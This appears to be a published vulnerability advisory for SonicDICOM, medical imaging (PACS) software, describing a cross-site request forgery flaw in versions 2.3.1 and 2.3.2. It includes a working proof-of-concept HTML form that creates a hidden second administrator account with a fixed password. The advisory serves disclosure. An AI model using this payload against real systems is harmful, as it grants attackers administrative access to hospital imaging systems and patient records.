### Summary
SonicDICOM is PACS software that combines the capabilities of DICOM Server with web browser based DICOM Viewer.
### Description
The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
### Vendor
JIUN Corporation - https://www.sonicdicom.com
### Affected Version
2.3.2 and 2.3.1
### Tested On
Microsoft-HTTPAPI/2.0
### PoC
```
<html>
<body>
<form action="http://172.19.0.214/viewer/api/accounts/create" method="POST">
<input type="hidden" name="Id" value="testingus" />
<input type="hidden" name="Name" value="Second Admin" />
<input type="hidden" name="Authority" value=“1” />
<input type="hidden" name="Password" value="654321" />
<input type="submit" value="Request" />
</form>
</body>
</html>
```
暂无评论